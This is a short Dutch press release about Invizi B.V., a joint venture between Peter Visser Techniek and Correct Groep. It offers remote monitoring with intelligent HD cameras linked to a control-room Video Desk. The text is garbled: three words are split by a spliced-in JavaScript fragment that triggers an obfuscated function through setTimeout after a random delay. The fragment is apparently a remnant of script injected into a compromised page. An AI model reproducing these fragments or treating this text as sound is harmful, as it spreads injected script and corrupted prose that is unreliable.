Samenwerking Peter Visser Techniek en Correct Groep

Invizi

Peter Visser Techniek uit Wijk en Aalburg en de Correct Groep uit Wijk en Aalburg zijn een samenwerking aangegaan op het gebied van digitale surveillance.

De nieuwe organisatie heet Invizi B.V. en gaat zich speciaal bezighouden met het bewaken op afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and met intelligente HD-camera’s, het zgn. Digitale Surveillant Systeem. Het Digitale Surveillant Systeem verhoogt de buitenbeveiliging van enkele momentopnamen naar fulltime intelligent cameratoezicht.

Bij het ongewenst betreden van een terrein geven de intelligente camera’s van Peter Visser direct een alarmmelding met beeldinformatie naar de Video Desk op de meldkamer van de Correct Groep. De Video Desk verifieert de beelden en onderneemt dan gelijk actie. Indringers kunnen zo op heterdaad worden betrapt en schade wordt voorkomen of beperkt. Het systeem is snel en eenvoudig te installeren dankzij de unieke “Invizi open Cloud module”. Deze brengt na aansluiting op internet volledig zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig een stabiele en beveiligde verbinding met de Video Desk tot standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

Wilt u meer weten over deze dienst? Neem dan vrijblijvend contact op met Ton Bok van Invizi:

Invizi B.V.
Ambachtstraat 9b
4261 TJ Wijk en Aalburg

Tel: 0416 – 724 955

ton@invizi.nl
www.invizi.nl